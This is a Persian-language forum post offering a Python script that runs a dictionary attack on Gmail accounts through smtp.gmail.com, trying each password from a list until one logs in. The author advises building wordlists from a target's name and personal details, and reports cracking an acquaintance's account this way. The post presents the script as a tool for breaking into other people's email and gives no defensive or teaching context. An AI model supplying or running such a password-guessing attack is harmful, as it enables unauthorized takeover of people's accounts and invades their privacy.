از اونجایی که بیشتر کرکرهای جیمیل از کار افتادن بالاخره به درخواست یکی از دوستان گفتم کرکر جیمیل رو بنویسم و براتون قرار بدم که استفاده کنین چون خودمم بار ها نیازم شده اما حسش نبوده درست کنم اما الان حس مس رو گذاشتم کنار چون بعضی مواقع بدرد میخوره :)
راستی توی این برنامه از طریق حملات دیکشنری ، ایمیل رو مورد عنایت قرار میدیم
نحوه ی کار کرد کرکرمون به این شکله که اول از همه یه آدرس ایمیل میگیریم ، بعدا هم مسیر یه فایل پسوورد رو میگیریم و در آخر هم با استفاده از اون پسوورد لیست سمت smtp.gmail.com از طریق پورت 587 درخواست میفرستیم و ایمیل و پسوورد رو روی اون تست میکنیم تا زمانی که جواب مثبت بگیریم
فقط یه نکته بگم اینکه اگه اطلاعات خاصی در مورد صاحب ایمیل دارین بهتره یه خرده از اونا در جهت نوشتن پسوورد استفاده کنین ، مثلا اگه اسم طرفی که ایمیل داره shadi باشه ، میتونیم پسوورد رو به این شکل بنویسیم Shadi12345 و ... که اینجور چیزارو میسپارم به خودتون تا در موردش تحقیق کنین چون قبلا تو یکی از پست های بخش کراک گفته بودم
در کل یه لیست پسوورد درست کنین و بعدش کدهای پایین رو کپی کنین داخل اسکریپت پایتونیتون
import smtplib
email = raw_input("Enter your target email address => ")
passwfile = raw_input("\nEnter your target password address => ")
passwfile = open(passwfile, "r")
def crack():
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
for password in passwfile:
try:
smtpserver.login(email, password)
print("\nYour email password was successfully found , password => %s" % password)
break
except smtplib.SMTPAuthenticationError:
print("\nThe password does not match the email you want , password => %s" % password)
crack()
حالا اسکریپت رو ذخیره و اجرا کنین که برای اینکار میتونین کلید F5 رو از روی کیبوردتون بزنین
وقتی که اسکریپت رو اجرا کردین ، آدرس یه ایمیلی رو بدین که برای خودتون باشه تا تست کنیم ببینیم برنامه درسته یا نه مثلا من آدرس ایمیل یکی از آشناهامو میدم که پسووردشم خوشبختانه مربوط به همون اطلاعات شخصی خودش میشد که فقط تاریخ تولدشو به آخر اسمش اضافه کرده بود
بعدا مسیر یه لیست پسوورد رو بدین که اگه فایل پسووردتون کنار اسکریپتتون بود نیازی نیست که مسیر بدین و فقط اسمشو با پسوندش بزنین کافیه
در آخر هم منتظر بمونین تا پسووردش پیدا شه که اگه پسووردش توی فایل پسوورد نباشه فایده ای نداره و برای همه ی تست های خودش مینویسه که رمز عبور با ایمیل مطابقت نداره
اینم تصویری از تست من
برای واضح تر شدن روی اون کلیک کنید
ضمنا این اسکریپت رو همینجوری هوایی نوشتم که هیچ قابلیتی نداره مثلا نه میتونیم Thread بدیم ، نه میتونیم لیستی از ایمیل هارو بدیم ،نه میتونیم تشخیص بدیم که ایمیل مورد نظرمون دو مرحله ای داره یا نداره و اگه داشته باشه برنامه تشخیص نمیده ، نه میتونیم کمبو بدیم که ببینیم کدومشون روی سایت جیمیل لاگین میده و خیلی چیزای دیگه که اونارو توی اسکریپت بعدی حتما قرار میدم چون اینو درخواست کرده بودن بخاطر همین عجله ای شد و نتونستم قابلیت های خاصی رو بهش بدم
در آخر اینکه جیمیل یا ... که از گوگل سرویس میگیرن به این راحتیا هک نمیشن و اگه هم هک بشن ، یه هکر اونقدر خنگ نیست که بخواد نحوه ی هک اونو به اشتراک بزاره چون دو روزه اون حفره بسته میشه و اون هکر کلی ضرر میکنه در حالی که میتونه از طریق اون حفره ی امنیتی کلی پول به جیب بزنه
اما بنظرم بهترین روش بعد از هک ، همین کرک کردن هستش که صد البته اینجوری فایده نداره و از 50 درصد شاید بتونیم 5 درصد ایمیل بزنیم ولی اگه به مباحث کرک آشنا باشیم میتونیم حرکتای بهتری بزنیم که بعدها هم قراره در مورد کرک کردن اکانت و اینجور مزخرفات پست بنویسم :)
موفق باشید
MR_C0D3R :
Virus 32 :
MicRoB 32 :
Ax0o 32 :